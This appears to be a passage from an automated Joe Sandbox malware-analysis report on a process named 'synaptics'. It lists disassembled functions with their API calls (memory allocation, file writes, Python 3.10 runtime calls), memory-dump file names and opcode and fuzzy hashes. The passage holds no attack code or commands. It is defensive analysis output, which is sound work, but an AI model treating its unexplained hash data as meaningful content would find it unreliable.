                                                                                                                                                                                                      Function 6C4A78D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: bJl@bJl
                                                                                                                                                                                                      • API String ID: 0-3970539066
                                                                                                                                                                                                      • Opcode ID: 56b8bb748bd52b9f4bbbc606181773cda86d7bd0f90895c30cfaa07f6abec7fa
                                                                                                                                                                                                      • Instruction ID: 33e92c6da982f402696e1059578cb2f13d4134eea6db58b382e5013fab11ba0b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56b8bb748bd52b9f4bbbc606181773cda86d7bd0f90895c30cfaa07f6abec7fa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E31E7327041154B9B10DB99AC40DAAB7ADEB9127BF20437BED18C3768EA31882687D4
                                                                                                                                                                                                      Function 6C57F910 Relevance: 3.1, APIs: 2, Instructions: 94fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,?,?,?,6C57FCBE,?,?,?,?,?,6C580B22), ref: 6C57F93A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fwrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3559309478-0
                                                                                                                                                                                                      • Opcode ID: b3d90ce9da826f7c59b428c858cd37e8d65135096348c1a88cbb067fb35cb140
                                                                                                                                                                                                      • Instruction ID: 2cae5c12e1131db3f4942c8b361ac50d4e5474d1f7ec40077d4a7869952845e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3d90ce9da826f7c59b428c858cd37e8d65135096348c1a88cbb067fb35cb140
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E82161727017049FD734CE6DE884A66B3E8EB84224F104B6FE85AC7A41E771E94986D0
                                                                                                                                                                                                      Function 6C583CD0 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?), ref: 6C583CD9
                                                                                                                                                                                                      • PyModule_AddObjectRef.PYTHON310(00000000,?,00000000), ref: 6C583CF6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromLongLong_Module_Object
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1016781113-0
                                                                                                                                                                                                      • Opcode ID: ffd63592e68c6720492bfa566a8c55f1311d7a1b15932ec657bddd8288a60dff
                                                                                                                                                                                                      • Instruction ID: a5fb45cdad0cd0a92cc22b6c4d4c7fce02ea20e380e6a9d5e33ec53d37747e87
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffd63592e68c6720492bfa566a8c55f1311d7a1b15932ec657bddd8288a60dff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56F0E537A451246BDA141A5AFC01CCB7B99DFC13B5B140339F92C876D0EA22EC26D3D0
                                                                                                                                                                                                      Function 00541227 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00541864: GetModuleHandleW.KERNEL32(00000000,005411F1,00542530,00000014), ref: 00541866
                                                                                                                                                                                                      • _c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00541239
                                                                                                                                                                                                      • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,00542530,00000014), ref: 00541268
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2397056113.0000000000541000.00000020.00000001.01000000.00000008.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397019641.0000000000540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397137864.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_540000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule_c_exit_exit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 750871209-0
                                                                                                                                                                                                      • Opcode ID: 27104c9cfc16b07d5ed4154b1402c92ae08b4b31abec6687f40a59b9f0d9bd86
                                                                                                                                                                                                      • Instruction ID: 7306c8e72a3459061b59093bc0c9ead119574b5b0888b9183dd1c7df769861d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27104c9cfc16b07d5ed4154b1402c92ae08b4b31abec6687f40a59b9f0d9bd86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CE08C36E08B4A8FCF25EBA8D8463DCBFB2FF85328F100565D921A32D1D7351880CA59
                                                                                                                                                                                                      Function 6C48CFC0 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,00000000,00000000,?,00000000,?,6C48E5C9,00000000), ref: 6C48D05A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Memory
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 581423314-0
                                                                                                                                                                                                      • Opcode ID: 055481f6e61026b6ef253ca8d923b170a665ee64ba0287b343585bacdaf6a77d
                                                                                                                                                                                                      • Instruction ID: c2d98554fa0b0b648779cfb29f1479ce4d4d782bcfd2dc130cd42506c9239f94
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 055481f6e61026b6ef253ca8d923b170a665ee64ba0287b343585bacdaf6a77d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2511D632B02A15579700DE7DAC80D55F7A9EBC523A714877AE93CC2AD0E731E82586D1
                                                                                                                                                                                                      Function 6C5885C0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyRuntime_Initialize.PYTHON310(?), ref: 6C588601
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InitializeRuntime_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 226365341-0
                                                                                                                                                                                                      • Opcode ID: 7b83cbecb019ae01be2b0a10a9588ddc0582aaaca81c99235260753d56cc52a9
                                                                                                                                                                                                      • Instruction ID: bca0ffcd9106f1279d2bc38f9e960a414f3408afdc0d0b65d41b748ec2c076c7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b83cbecb019ae01be2b0a10a9588ddc0582aaaca81c99235260753d56cc52a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F119071A05328CFD710CF25D80579A73F8EF89318F05856AE8558B690EB74ED48CB92
                                                                                                                                                                                                      Function 6C4A08A0 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyModule_GetNameObject.PYTHON310(?), ref: 6C4A08A9
                                                                                                                                                                                                        • Part of subcall function 6C4A0A10: PyType_IsSubtype.PYTHON310(?,?,?,?,?,?,?,6C4A0773,?), ref: 6C4A0A2D
                                                                                                                                                                                                        • Part of subcall function 6C4A0A10: PyUnicode_FromString.PYTHON310(bad argument type for built-in operation), ref: 6C4A0A4A
                                                                                                                                                                                                        • Part of subcall function 6C4A0A10: _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,bad argument type for built-in operation), ref: 6C4A0A54
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Object$Err_FromModule_NameStringSubtypeType_Unicode_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2690101672-0
                                                                                                                                                                                                      • Opcode ID: ed2611c44dadd1d55124d4df99c8239a6d8acb7ace756576e1f926be2c7ddf87
                                                                                                                                                                                                      • Instruction ID: c3e74fa860e667ec7722a0bf692c78f10654e9ccb6814cb6ea4e0b6efa5c614a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed2611c44dadd1d55124d4df99c8239a6d8acb7ace756576e1f926be2c7ddf87
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE0E537B401141386049599BC00CDB739A8BD1275B18033EE92E877C0DA65EC47D7D2
                                                                                                                                                                                                      Function 6C582880 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyList_New.PYTHON310(?,?,?,?,?,00000000), ref: 6C5828BC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4215266370-0
                                                                                                                                                                                                      • Opcode ID: 284d9b405aa7dcb9fc08717e94a82cbb94f769aba98802bfa89d90048966d212
                                                                                                                                                                                                      • Instruction ID: 1849aa02f27a83e8a5fe049fd0e9538d33c0f81979df3a337c0fb45538290fa1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 284d9b405aa7dcb9fc08717e94a82cbb94f769aba98802bfa89d90048966d212
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F0C9B15093029BD704DF19DC59B4BBBE4AF84758F004A2DF89886390E774D648CBD7
                                                                                                                                                                                                      Function 6C4A61F0 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000001,?,6C5B99EC,00000000,00000001), ref: 6C4A620A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: calloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2635317215-0
                                                                                                                                                                                                      • Opcode ID: 0eab43d297481565bf343bdb71b2ef83fe22c43155a1e631bbc4c1ec4d715f0a
                                                                                                                                                                                                      • Instruction ID: b0cf86dfbaf8e17167f6ba6539a61addd8d8a974bc59aa260ca30044454c3b98
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0eab43d297481565bf343bdb71b2ef83fe22c43155a1e631bbc4c1ec4d715f0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2D0C73171020D57FF089EE99C15EBA339CAB5070EF45412CFC25C7741EA65FD104654
                                                                                                                                                                                                      Function 6C4A61D0 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C4A61E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                                                      • Opcode ID: ceaaef5def3f1150a6b819cea05282391365b641ca45649960b630a50ce12837
                                                                                                                                                                                                      • Instruction ID: b3e8b64d090256cddcb855d8b0d132f7db87ca6a206b2978f9ee51a72ce188ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceaaef5def3f1150a6b819cea05282391365b641ca45649960b630a50ce12837
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDC08C303003085BEB082628AC1467633DC9B44615F040038AC0B82300E636FD108085
                                                                                                                                                                                                      Function 6C4A6240 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6C57957D,00000000), ref: 6C4A6246
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free
